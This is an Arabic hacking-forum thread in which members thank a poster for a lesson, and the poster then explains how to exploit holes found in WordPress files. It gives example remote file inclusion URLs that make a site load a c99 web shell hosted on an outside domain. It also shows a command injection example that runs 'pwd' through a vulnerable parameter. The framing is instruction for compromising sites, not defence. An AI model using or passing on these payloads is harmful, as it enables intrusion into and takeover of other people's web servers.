المشاركة الأصلية كتبت بواسطة Z3r0-c00l مشكوووور اخي يشرفني اكون اول من يرد على الدرس تقبل مروري ياغالي هلا فيك حبيبي بالتوفيق.. المشاركة الأصلية كتبت بواسطة اخلاقي تاج راسي ما شاء الله تباركـ الله بطل كعادتكـ ياربي من جد كنت اتعب نفسي انزل السكربت وروح لي ملف ملف وابحث عن طريق المفكرة لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe ربي يعطيكــ بنتظار الدرس القادم . تحياتي . نورت اخوي 'اخلاقي' شوف يالغالي.. بخصوص انك بعد ما تلاقي خطأء وتجيلك مشكلة انك كيف تعرف مسار الثغرة عشان تطبقها على الموقع.. هاي سهله جدا, يعني لنفترض انك حملت سكربت وورد برسس عشان تفحصه يدوي على طريقتك انتي(اليدوية), ولنفترض كمان انك وجدت ثغرة داخل ملف wp-settings مثلاا.. وهذا ملف الـwp-settings موجود على الرئيسيه في سكربت وورد برسس ولنفترض كمان انه الموقع مركب السكربت على الرئيسيه مش داخل مجلدات واذا بدك تدخل مثلا على لوحة التحكم تدخل هكذا www.site.com/wp-login.php وكمان نفس الشي اذا بدك تستعرض ملف wp-settings رح يكون الاستعراض هكذا www.site.com/wp-settings.php وكمان لنفترض انه الدالات المصابه هني على سبيل المثال: qx ودالة اخرى اسمها aljyyosh ونوع الثغرة لنفترض كمان انها ثغرة الفايل انكلود File Include وثغرة الفايل انكلود لازم يكون معك شل بصيغة txt مرفوع موقع عادي الاستغلال راح يكون هيك: www.site.com/wp-settings.php?qx=http://c99.gen.tr/c99.txt? http://c99.gen.tr/c99.txt? :: هذا الشل الي بصيغة تكست وكمان بنفع يكون الاستغلال هيك: www.site.com/wp-settings.php?aljyyosh=http://c99.gen.tr/c99.txt? ونفس الشي اذا كانت الثغرة موجوده داخل مجلد او مجلدات., مثلا داخل هذا المسار wp-content\themes\twentyten والملف المصاب archive مثلا.. والدالة المصابة qx, ونوع الثغرة الكوماند,, الاستغلال رح يكون هيك www.site.com/wp-content/themes/twentyten/archive.php?qx=pwd pwd :: امر من وامر الينكس يعرض لك مسارك على السيرفر بالتوفيق لك اخوي..
عرض سحابة الكلمة الدلالية
قوانين المنتدى
